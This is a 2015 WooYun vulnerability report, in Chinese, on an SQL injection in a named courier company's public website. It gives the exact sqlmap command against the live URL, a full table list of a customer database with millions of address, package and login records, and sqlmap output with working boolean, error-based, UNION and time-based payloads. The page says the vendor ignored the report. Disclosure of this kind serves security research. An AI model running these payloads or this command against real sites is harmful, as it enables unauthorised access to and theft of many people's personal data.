当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144783

漏洞标题:UCS官网SQL注入可导致3000w快递单信息泄露

相关厂商:UCS

漏洞作者: 路人甲

提交时间:2015-10-04 18:08

修复时间:2015-11-18 18:10

公开时间:2015-11-18 18:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

UCS一个知名快递厂商 朋友买东西用了他家的快递 顺手测试下
Currently, we can ship from the following countries to China, Hong Kong, and Taiwan:
· United States (CA, NY, DE)
· Amsterdam, Netherland
· France
· Germany
· Japan
· London, England
· Melbourne/Sydney, Australia
· Vancouver, Canada
· Vienna, Austria

详细说明:

注入点:
python sqlmap.py -u "http://www.ucsus.com/News.asp?Method=View&NewsID=170"
【sqlmap截图】:

1.jpg


【数据库截图】:
数据量已在图中标出

2.jpg


| dbo.UCS_PackageStatusLOG | 33814513 包裹状态
| dbo.UCS_SenderAddress | 3980814 |
| dbo.UCS_ReceiveAddress | 3959837 | 收发地址
|“dbo.UCS_ReceivePackage_History | 1948694 |
| dbo.UCS_ReceivePackage_History | 1948694 | 历史记录
【数据库信息】:

Database: UCS
+----------------------------------------+---------+
| Table | Entries |
+----------------------------------------+---------+
| dbo.UCS_PackageStatusLOG | 33814513
| dbo.UCS_NEWPODItemAPI | 10928805
| dbo.UCS_NEWPODItemAPI | 10928805
| dbo.UCS_TransitStatus_History | 9320179 |
| dbo.UCS_TransitStatus_History | 9320179 |
| dbo.UCS_ShipmentItem_History | 4105276 |
| dbo.UCS_ShipmentItem_History | 4105276 |
| dbo.UCS_SenderAddress | 3980814 |
| dbo.UCS_ReceiveAddress | 3959837 |
| dbo.aaa | 3055047 |
| dbo.UCS_TrackingConfirm_20150729 | 2659181 |
| dbo.UCS_TrackingConfirm_20150729 | 2659181 |
| dbo.UCS_NEWPODAPI | 2221796 |
| dbo.UCS_NEWPODAPI | 2221796 |
| dbo.UCS_TrackingConfirmLog | 2162962 |
| dbo.UCS_Transit | 1975173 |
| dbo.UCS_ReceivePackage_History | 1948694 |
| dbo.UCS_ReceivePackage_History | 1948694 |
| dbo.UCS_EDILog | 1661784 |
| dbo.UCS_BillRece | 1643932 |
| dbo.UCS_PackageStatus_20150415 | 1596090 |
| dbo.UCS_PackageStatus_20150415 | 1596090 |
| dbo.UCS_Billinfo | 1405279 |
| dbo.UCS_Billinfo | 1405279 |
| dbo.UCS_PackingListCompare | 1130855 |
| dbo.UCS_PackingListCompare | 1130855 |
| dbo.查询 | 10747
| dbo.Sync_Old2New_TrackInf | 964505 |
| dbo.Sync_Old2New_StationUserID | 959997 |
| dbo.Sync_Old2New_TrackConfirm | 952638 |
| dbo.Sync_Old2New_Track_PPLNO | 941882 |
| dbo.Sync_Old2New_TrackWt_PP | 941878 |
| dbo.Sync_Old2New_TrackWt_PP | 941878 |
| dbo.UCS_ZipArea | 868624 |
| dbo.UCS_Iherb_Confirm | 853216 |
| dbo.UCS_Shipment_History | 848590 |
| dbo.UCS_Shipment_History | 848590 |
| dbo.UCS_Package_History | 848543 |
| dbo.UCS_Package_History | 848543 |
| dbo.UCS_Envelope | 760646 |
| dbo.UCS_ExportInsurance | 646146 |
| dbo.UCS_ExportInsuranceRemark | 645138 |
| dbo.UCS_LoginLog | 382674 |
| dbo.UCS_LoginLog | 382674 |
| dbo.Ucs_HpodData | 327163 |
| dbo.UCS_EmsReturnInfo | 319883 |
| dbo.Ucs_ManifestUploadLog | 281685 |
| dbo.UCS_FreeTrackNumber | 246017 |
| dbo.UCS_ChangeTrackingBounding | 243301 |
| dbo.Warehouse_TransitLog | 233017 |
| dbo.UCS_Remark | 221049 |
| dbo.UCS_StationLOG | 189513 |
| dbo.UCS_TaxPackage | 187064 |
| dbo.UCS_TrackIndex | 185258 |
| dbo.UCS_TrackNumberTJHistory | 177458 |
| dbo.UCS_TrackNumberTJHistory | 177458 |
| dbo.Ucs_SchedulePickupConfirm | 167221 |
| dbo.Ucs_SchedulePickupConfirm | 167221 |
| dbo.UCS_BillInvoice | 164094 |
| dbo.UCS_ThirdPartyAddress | 152544 |
| dbo.UCS_PackingListConfirm | 132109 |
| dbo.UCS_UserGroup | 131102 |
| dbo.UCS_UserGroup | 131102 |
| dbo.UCS_PackageStatusTemp1 | 117673 |
| dbo.yao | 106630 |
| dbo.UCS_ReceivePackageBindInvoiceNote | 102036 |
| dbo.UCS_BillInvoiceStatus | 96975 |
| dbo.CallCenter_DutyDate | 87974 |
| dbo.UCS_BillOtherFee | 87200 |
| dbo.UCS_PackingListWorkTime | 87189 |
| dbo.UCS_BillSS | 79392 |
| dbo.UCS_BillHistory | 77211 |
| dbo.UCS_ZIPCodeUS | 76109 |
| dbo.SyncTrackNumber | 64450 |
| dbo.CallCenter_TSS | 55384 |
| dbo.shaozhongl | 52138 |
| dbo.steven13you | 52138 |
| dbo.UCS_AddressBook | 43320 |
| dbo.UCS_ZIPCodeCN | 40620 |
| dbo.Warehouse_SubPackage | 40354 |
| dbo.UCS_InvoiceNote | 39302 |
| dbo.CallCenter_CustomsCheck | 33328 |
| dbo.Warehouse_ProductItem | 31363 |
| dbo.Warehouse_ProductItem | 31363 |
| dbo.Warehouse_Package | 30432 |
| dbo.UCS_BatchImport | 23469 |
| dbo.UCS_PrePaidPackage | 19154 |
| dbo.Sync_Old2New_HpodTrackEvent | 16711 |
| dbo.UCS_NoAuthenticateTrackNumber | 16627 |
| dbo.UCS_Account | 16467 |
| dbo.YouJia201404 | 15345 |
| dbo.YouJia201404 | 15345 |
| dbo.YouJia201405 | 14897 |
| dbo.Sync_Old2New_HpodTrackElhkTag | 14182 |
| dbo.UCS_IsElHkTrack | 14176 |
| dbo.YouJia201406 | 13203 |
| dbo.UCS_EmsGroup | 12525 |
| dbo.UCS_ReceiveGroup | 11984 |
| dbo.UCS_DriverWorkTime | 11033 |
| dbo.UCS_BillTemp | 9303 |
| dbo.ucs_packagesyncstatus | 9123 |
| dbo.PackageBatchImport | 9100 |
| dbo.UCS_MessageOK | 7918 |
| dbo.UCS_MessageOK | 7918 |
| dbo.UCS_MainInvoice | 6928 |
| dbo.Steven_shuijin07 | 6633 |
| dbo.YouJia201407 | 6203 |
| dbo.UCS_TransportOilWear | 5546 |
| dbo.GuestBook | 5542 |
| dbo.UCS_AwbNumber | 5368 |
| dbo.TrackNumber_20130129 | 5356 |
| dbo.UCS_AWBHouse | 5125 |
| dbo.tracknumbersuijin | 5099 |
| dbo.TrackNumber_FZ | 5000 |
| dbo.UCS_ReturnPackage | 4908 |
| dbo.Sheet1$ | 4639 |
| dbo.UCS_ShippingMark | 4504 |
| dbo.bushuju2012110702 | 4486 |
| dbo.bushuju2012110701 | 4482 |
| dbo.UCS_ManifestStatusLog | 3753 |
| dbo.UCS_ManifestStatusLog | 3753 |
| dbo.UCS_MGroup | 3669 |
| dbo.UCS_CheckPrint | 2659 |
| dbo.UCS_ManifestBind | 1945 |
| dbo.UCS_QuanShunLog | 1911 |
| dbo.UCS_PickupQueue | 1784 |
| dbo.UCS_TransportOiling | 1728 |
| dbo.UCS_Email | 1669 |
| dbo.UCS_HShipment | 1657 |
| dbo.NonePhoneTrackNo | 1621 |
| dbo.UCS_AwbNoManage | 1618 |
| dbo.UCS_UPUCode | 1557 |
| dbo.UCS_Currency | 1535 |
| dbo.Warehouse_User | 1340 |
| dbo.UCS_Iherb_Scan_Log | 1259 |
| dbo.UCS_PartnerPackingListPaletCount | 1218 |
| dbo.UCS_PartnerPackingListPaletCount | 1218 |
| dbo.Warehouse_ProductOrderDetail | 1088 |
| dbo.Warehouse_ProductOrderDetail | 1088 |
| dbo.UCS_RateCheck | 1027 |
| dbo.UCS_RateCheck | 1027 |
| dbo.Sync_Old2New_UserInf | 810 |
| dbo.UCS_TSAPass | 790 |
| dbo.UCS_BatchArrival | 781 |
| dbo.UCS_PartnerInvoiceGroup | 745 |
| dbo.UCS_PartnerInvoiceGroup | 745 |
| dbo.UCS_MultiplePOD | 740 |
| dbo.UCS_ItemLimitBlack | 723 |
| dbo.UCS_ItemLimitBlack | 723 |
| dbo.UCS_ItemLimitBlack | 723 |
| dbo.CallCenter_ReturnGroup | 657 |
| dbo.TempReturnPackage130322 | 606 |
| dbo.UCS_FreePackage | 589 |
| dbo.UCS_TrackingNoManage | 526 |
| dbo.UCS_Reason | 511 |
| dbo.UCS_CustomsCode | 400 |
| dbo.UCS_ZIPCodeTW | 387 |
| dbo.UCS_TaxLog | 302 |
| dbo.UCS_TaxLog | 302 |
| dbo.UCS_PickupAddress | 254 |
| dbo.UCS_AirFlight | 240 |
| dbo.UCS_Performance | 217 |
| dbo.UCS_Commission | 197 |
| dbo.UCS_QuickPOD | 186 |
| dbo.UCS_StationContact | 179 |
| dbo.UCS_ChangeTypeConfig | 160 |
| dbo.UCS_IPLicence | 157 |
| dbo.UCS_HpodInsError | 142 |
| dbo.UCS_EDIErrorCode | 100 |
| dbo.UCS_Staff | 93 |
| dbo.UCS_News | 89 |
| dbo.SYNC_MYSQL | 85 |
| dbo.UCS_AwbAddress | 60 |
| dbo.UCS_AwbAddress | 60 |
| dbo.cs131101 | 59 |
| dbo.UCS_PartnerContact | 41 |
| dbo.UCS_PartnerContact | 41 |
| dbo.Warehouse_Location | 36 |
| dbo.UCS_CustomerNeeds | 35 |
| dbo.UCS_CustomerNeeds | 35 |
| dbo.UCS_InvoiceItemClass2 | 35 |
| dbo.UCS_TransportCar | 33 |
| dbo.UCS_CustomsUnit | 32 |
| dbo.Sync_Old2New_TrackElhk | 31 |
| dbo.UCS_Airport | 31 |
| dbo.Warehouse_ServiceFee | 31 |
| dbo.UCS_EDIDispatch | 28 |
| dbo.UCS_Help | 27 |
| dbo.UCS_BEEvent | 23 |
| dbo.UCS_EDIState | 22 |
| dbo.CallCenter_TrackPackage | 19 |
| dbo.UCS_AirLine | 19 |
| dbo.UCS_ZIPCodeHK | 18 |
| dbo.UCS_PartnerPackingStatusNotify_EMI | 17 |
| dbo.UCS_PartnerPackingStatusNotify_EMI | 17 |
| dbo.UCS_AccountType | 15 |
| dbo.UCS_BillStatement | 13 |
| dbo.UCS_PaymentType | 13 |
| dbo.UCS_Surcharge | 13 |
| dbo.UCS_InsuranceCommission | 11 |
| dbo.UCS_InsuranceCommission | 11 |
| dbo.UCS_InvoiceItemClass3 | 11 |
| dbo.UCS_RmSmallClass | 11 |
| dbo.Warehouse_Express | 11 |
| dbo.UCS_Country | 10 |
| dbo.UCS_CreditCard | 10 |
| dbo.UCS_PickupLocation | 10 |
| dbo.UCS_Type | 7 |
| dbo.UCS_KnowShipperAddress | 5 |
| dbo.UCS_Refund | 5 |
| dbo.UCS_StationInventoryGroup | 5 |
| dbo.UCS_StationInventoryGroup | 5 |
| dbo.CallCenter_DutyCustomsCode | 4 |
| dbo.CallCenter_DutyCustomsCode | 4 |
| dbo.UCS_Area | 4 |
| dbo.UCS_StationArea | 4 |
| dbo.UCS_StationArea | 4 |
| dbo.Warehouse_Shelf | 4 |
| dbo.UCS_BillInPayFee | 3 |
| dbo.UCS_InsuranceCurrency | 3 |
| dbo.UCS_RmBigClass | 3 |
| dbo.UCS_SubInvoiceNote | 3 |
| dbo.Warehouse_Name | 3 |
| dbo.CallCenter_OtherFee | 2 |
| dbo.UCS_AwbRateAdjust | 2 |
| dbo.UCS_AwbRateAdjust | 2 |
| dbo.UCS_InvoiceItemClass1 | 2 |
| dbo.Warehouse_BigClass | 2 |
| dbo.Warehouse_SmallClass | 2 |
| dbo.CallCenter_LockGoodsGroup | 1 |
| dbo.CallCenter_LockGoodsGroup | 1 |
| dbo.UCS_Location | 1 |
| dbo.UCS_Setup | 1 |

漏洞证明:

【sqlmap全过程】

[17:15:19] [INFO] testing connection to the target URL
[17:15:27] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[17:15:29] [INFO] target URL is stable
[17:15:30] [INFO] heuristics detected web page charset 'ascii'
[17:15:30] [INFO] heuristic (basic) test shows that GET parameter 'NewsID' might
be injectable (possible DBMS: 'Microsoft SQL Server')
[17:15:31] [INFO] testing for SQL injection on GET parameter 'NewsID'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL S
erver'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1) values? [Y/n]
[17:16:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:16:08] [INFO] GET parameter 'NewsID' seems to be 'AND boolean-based blind -
WHERE or HAVING clause' injectable
[17:16:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[17:16:08] [INFO] GET parameter 'NewsID' is 'Microsoft SQL Server/Sybase AND err
or-based - WHERE or HAVING clause' injectable
[17:16:08] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:16:09] [INFO] GET parameter 'NewsID' is 'Microsoft SQL Server/Sybase inline
queries' injectable
[17:16:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[17:16:09] [WARNING] time-based comparison requires larger statistical model, pl
ease wait....................
[17:16:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[17:16:28] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query)'
[17:16:34] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query - comment)'
[17:16:38] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav
y query)'
[17:17:39] [INFO] GET parameter 'NewsID' seems to be 'Microsoft SQL Server/Sybas
e OR time-based blind (heavy query)' injectable
[17:17:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:17:39] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[17:17:41] [WARNING] reflective value(s) found and filtering out
[17:17:41] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[17:17:44] [INFO] target URL appears to have 8 columns in query
[17:17:55] [INFO] GET parameter 'NewsID' is 'Generic UNION query (NULL) - 1 to 2
0 columns' injectable
GET parameter 'NewsID' is vulnerable. Do you want to keep testing the others (if
any)? [y/N]
sqlmap identified the following injection points with a total of 53 HTTP(s) requ
ests:
---
Parameter: NewsID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Method=View&NewsID=170 AND 2212=2212
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Method=View&NewsID=170 AND 3021=CONVERT(INT,(SELECT CHAR(113)+CHAR(
113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3021=3021) THEN CHAR(49)
ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: Method=View&NewsID=-4728 UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+
CHAR(112)+CHAR(107)+CHAR(113)+CHAR(109)+CHAR(97)+CHAR(117)+CHAR(72)+CHAR(102)+CH
AR(85)+CHAR(87)+CHAR(71)+CHAR(116)+CHAR(109)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(1
12)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: Method=View&NewsID=-9061 OR 6159=(SELECT COUNT(*) FROM sysusers AS
sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysuser
s AS sys6,sysusers AS sys7)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: Method=View&NewsID=(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+
CHAR(113)+(SELECT (CASE WHEN (3277=3277) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(
113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113))
---
[17:18:30] [INFO] testing Microsoft SQL Server
[17:18:31] [INFO] confirming Microsoft SQL Server
[17:18:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2008

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)